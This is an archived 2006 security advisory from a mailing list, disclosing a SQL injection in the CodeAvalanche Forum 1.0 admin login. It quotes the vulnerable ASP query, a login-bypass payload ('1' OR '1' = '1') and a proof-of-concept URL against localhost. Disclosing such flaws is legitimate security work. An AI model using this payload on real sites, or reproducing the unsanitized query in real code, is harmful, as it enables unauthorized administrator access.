CA Forum Remote SQL Injection

---

• From: omnipresent@xxxxxxxx
• Date: 1 Jun 2006 17:09:10 -0000

---

------------------------------------------------------------------
- CAForum 1.0 Remote SQL Injection -
-= http://colander.altervista.org/advisory/CAForum.txt =-
------------------------------------------------------------------

-= CodeAvalanche Forum Version 1.0 =-



Omnipresent
june 01, 2006


Vunerability(s):
----------------
SQL Injection



Product:
--------
CodeAvalanche Forum Version 1.0

Vendor:
--------
http://www.truecontent.info/codeavalanche/asp-forum-script.php


Description of product:
-----------------------

CodeAvalanche FreeForum is asp forum application which allows free posting, there is no needs for registration of your
visitors. Administrator can add unlimited number of forum categories.


Vulnerability / Exploit:
------------------------

In the file default.asp in Admin directory is vulnerable to an Remote SQL Injection Attack.
A malicious people can gain Admin rights by putting rights parameters in the Password Variable.

Let's Check the source code:

<% Response.Buffer = True


userLogged=false
If Request("Password")<>"" Then
'response.Write(Request("Password"))
'response.flush

dim rsUser,selectSQL
selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"


[...]



[End default.asp]

As you can see the variable Password is not properly sanitized before be used, so an attacker can put this string in the
password field:


1' OR '1' = '1

So, the query will be:

selectSQL="SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'


And you can gain access to the application with admin rights.


PoC / Proof of Concept of SQL Injection:
----------------------------------------

This is a simple Proof Of Concept used on my local machine:


http://127.0.0.1/[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1


Vendor Status
-------------

Not informed!

Credits:
--------
omnipresent
omnipresent@xxxxxxxx

---

• Prev by Date: [ MDKSA-2006:094 ] - Updated evolution packages fix DoS (crash) vulnerability on certain messages.
• Next by Date: Forensic memory dumping intricacies - PhysicalMemory, DD, and caching issues
• Previous by thread: [ MDKSA-2006:094 ] - Updated evolution packages fix DoS (crash) vulnerability on certain messages.
• Next by thread: Forensic memory dumping intricacies - PhysicalMemory, DD, and caching issues
• Index(es):
  • Date
  • Thread

---

Relevant Pages [waraxe-2008-SA#069] - Multiple Sql Injection in vBulletin 3.7.4 ... vBulletin is a professional, affordable community forum solution. ... As result sql injection is possible. ... This results with error message from vBulletin: ... (Bugtraq) Snitz2000 SQL Injection: A user can gain admin level ... # Last bug report in 2007-02-16 with 4692 visitors ... A user can gain admin level in the forum and can access to the forum. ... It is because of a SQL Injection in "Active.asp" ... (Bugtraq) Fusetalk SQL injection submission. ... I have found sql injection in FuseTalk 2.0 during a legitmate audit. ... have exchanged emails with rkeith@xxxxxxxxxxxxxxxxx who needed more ... Direct SQL queries can occur to grab entire database ... The seems to have been a problem accessing the forum which you are ... (Bugtraq) Re: Top Ten PHP Security Issues, a preliminary list ... such as security against SQL injection need to be ... because people might wanna run a forum about SQL ... (comp.lang.php) RIblog Remote SQL Injection Exploit ... RIblog Remote SQL Injection Exploit - ... This software is vulnerable to a Remote SQL Injection. ... an attacker can exploit this vulnerability by injection SQL Code. ... The attacker can gain access to the blog and edit, view comments, etc, etc. ... (Bugtraq)

---

We are proud to have Web Hosting and Rack Housing from 9 Net Avenue Deutschland.
(11)